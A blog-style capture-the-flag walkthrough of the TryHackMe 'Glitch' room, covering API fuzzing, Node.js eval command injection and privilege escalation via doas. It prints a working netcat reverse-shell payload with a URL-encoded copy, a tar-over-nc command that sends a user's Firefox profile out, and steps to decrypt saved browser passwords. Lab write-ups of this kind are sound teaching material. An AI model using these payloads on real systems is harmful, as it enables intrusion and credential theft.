TryHackMe Glitch Walkthrough

The platform develops virtua l classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

TryHackMe Glitch Walkthrough


While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
  

Good day hacker, Spend more time in the CLI as much as you can, For that’s where we belong.


Glitch is a easy machine from TryHackMe that proves your ability to enumerate quickly and proves the solidification of your methodology.TryHackMe Glitch Walkthrough

Security Problem

The app is vulnerable to command injection/execuiton via the usage of eval. The exploit code can be passed to eval and executed, so the root of the problem is is bad programming practice in Node.js, that allows an unpriviledged user to supply data which will be executed on the server.



Let's start with a quick comprehensive nmap scan

Here we can say that the room will turn around a website as the port 80 is open.

Now let's run gobuster to enumerate all the directories
 

Let’s check what is the content of this website. The page is quite empty, and we can check the source code of the page but it is quite empty as well. For curiosity, I also checked the cookies.

Something looks strange here… The website sent me a cookie with the value “value”, which is weird. Ok, let’s keep it in mind!

Gobuster says that there a directory /secret. Let’ check this page and the source code of the page: 

The page itself doesn’t have a lot of content. However, in the source code we see a JavaScript and a getAccess to an API. Let’s check this:

Hmm interesting! When we check this endpoint, we have a token. It looks encrypted on base64, let’s decrypt it.

Perfect, we have our first flag and a token !

Let’s try to change the value of the cookie with this token and refresh the page:

Amazing! The home page changed as well.

Let’s check the page and its source code:

The page doesn’t have a lot of information but in the source code we can find a JavaScript file => script.js. Let’s check what this script does:

Basically, here the script will take items in the API and show it in the browser. Let’s check those items => http://ipmachine/api/items

 

We don’t have a lot of information here either. I will be clear with you, I got stuck for a while trying to figure out what is the next step.


Finally, I decided to take a hint.

The hint says that we should try another API method.

As a beginner, I never played with API before. So, the only solution was to try to read and learn about API and the way that they work.

Most of the time, an API works with GET, POST, DELETE, and so on. The hint says that we need to play around with those methods.

In order to change the method, I used Burp.

First let’s intercept the request.


Turn Intercept On
 

Go to http://ipmachine/api/items

You can see here that the method is GET. Let’s change GET to OPTIONS, to see all the options that we can use with this API endpoint (send what you intercepted to Repeater):

 

Basically here, we have 3 methods that we can play around with this endpoint: GET, HEAD and POST. We know already the result for GET. We don’t have results for HEAD. Let’s try POST:

Hmm… I think we have something here, right? Someone put intentionally this message there. Maybe we are in the good way.


From here, I needed to read more about APIs and the way that they work. If you are new as me, I will summarize what I learned about it and explain in an easy way:

API

The basic goal of an API is to communicate with another application. In order, to receive an information we use the method GET. However, if we want to send an information, we will use POST method.

A quick example: let’s say we want to buy a BWM car and we go to a website where contains a search bar and we want to send a request to see all the “BMW” cars that they have in stock. Here in this example, their site communicate with another application to show the stock. The value of our search is “BMW” and the name of the variable is “cars”. The request that we will send to this API will look like this:

http://ipmachine/api/items?cars=BMW

 

Good, we know the structure of the request, but we don’t really know what is the POST request that we need to send. We will need to discover what come after “items?” (the variable “cars” in my example). To find out this we can fuzz this request and see the POST responses. In order to this, I will use wfuzz.



PS: Just to illustrate my example, I will put the value that we expect as “bwm”:




wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt -X POST — hh 45 -u http://IPMACHINE/api/items\?FUZZ\=bwm

• · -c: flag is used to show the output in colors
  

• · -z: to specify the payload list.
  

• · — hh 45: When we sent the POST request through burp, we saw that the content length of the “matrix message” was 45. In order to not show anymore this response, I put –hh 45. Basically here, wfuzz will hide all responses containing 45 characters. Indeed, this matrix message doesn’t have any value for us.

• · -u: the url that you need to fuzz.

 

 

Hmm… it looks very good! However, nothing happened to my listener. It looks like the payload didn’t really work but the website says that we exploited the vulnerability. Really weird, right?


But don't let's move to the curl tool

curl -X POST <machine ip>/api/items\?cmd\=ls
 
<title>Error</title>
 
 

So it's a Node.JS. Maybe I can get rce by Node.js eval ...

Reverse shell payload :- Click Here

Node JS Reverse shell payload :- Click Here

cmd=require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ') 

require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ') 

First, I must encode the payload as a URL, and then It's good to go

 %63%6d%64%3d%72%65%71%75%69%72%65%28%22%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%22%29%2e%65%78%65%63%28%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%38%2e%36%31%2e%32%33%34%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66%20%27%29%0a%0a
 

After decoding let's take reverse shell via curl in terminal

This shell is a bit ugly, let’s change it => python3 -c 'import pty;pty.spawn("/bin/bash")'

Let’s find user.txt file. Most of the time, we can find this file in the home directory of the user. Let’s check there first:

Perfect, we just found the second flag. Now we need to find a way to escalate the privilege to get root and then read the file root.txt.

When we visit the home folder, we can see that there is another user: v0id. Let’s check what he has in his folder:

Nothing interesting here…

Let’s list all the users:


 

 We can see here that we have 3 users that we could exploit: user (we exploited already), v0id and root.


Our goal now is to find a way to escalate our privilege:

• · horizontally (to v0id)
• · vertically (to root).

First, let’s try “sudo -l”… It doesn’t work. We need to find another way.


Let’s go back to the user’s home directory and check what is inside:

There is a .firefox directory hidden there. Basically, this directory could contain passwords saved on Firefox Browser. Maybe we can try to find something there.


A few months ago, I read that it is possible to decrypt the content of this file. Let’s transfer this folder .firefox to our machine then decrypt it.


In the target machine, connect back to your machine. In order to do that, go to the /home/user/.firefox then connect back to your machine from there. This will give you access (in your machine) to all the content of .firefox directory.


In the ROOM Machine:


cd /home/user/.firefox



tar cf — .firefox/ | nc IPOfYourMachine 1234

and

in my machine we run a command

nc -lvnp 1234 > out.tar

then, lets extract the file

tar xvf out.tar

Now we need to change the file permission to make it executable.

as you can see our file is extracted here...

In order to find all the hidden information in this directory, we can use a script created by unode => Link GitHub

Github File Here :- Click Here

Clone this script to your machine:

Now let’s decrypt the b5w4643p.default-release file:


our file is glitch-tryhackme inside that's why we used "  ../  "

../.firefox/b5w4643p.default-release

Hmm interesting! Here we can see that the user v0id used this password on the glitch.thm website. Maybe he uses the same password to login in his linux machine? Let’s try to switch to his user:

Good, we just escalated (horizontally) the privileges to v0id user. Now let’s find a way to escalate the privilege (vertically) to the root user.


Let’s check the basic things (as it is an “easy” room) such as: sudo -l, cron jobs, etc/shadow, etc… Nothing special there. I also run linpeas to check if there is something interesting, but I couldn’t find anything. I got stuck here for a while…


Let’s take the last hint of the room: My friend says that sudo is bloat.


I didn’t have any idea what it means, so I googled it and I found this video :



Sudo Is Bloat. Use Doas Instead => Link of the YouTube Video


Basically, doas is a kind of sudo. As we want to have a root shell, we need to execute a command like: sudo -u root /bin/bash. However, if you try with sudo, it doesn’t work.


In the video, it says that we can use doas instead of sudo. So let’s try it:

Finally, we got root. Let’s check the root.txt, most of the time this file is in root folder.
 
 
 

After several hours of trying and error, we finally got the third and last flag! It was not easy at all for me. I needed to search a lot and read a lot. However, I learned a lot!

Things that we could learn during this room:

• · Find information in JavaScript code
•   
  
• · How API works
•  
• · Fuzz an URL with wfuzz
•  
• · RCE through NodeJS
•  
• · Find passwords hidden on Firefox folder.
•  
• · Another alternative for sudo (doas)

In my option, they should change the difficulty of this room. Most of the concepts that we saw during this writeup are not really for beginners. They should change the difficulty to medium (intermediate).

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)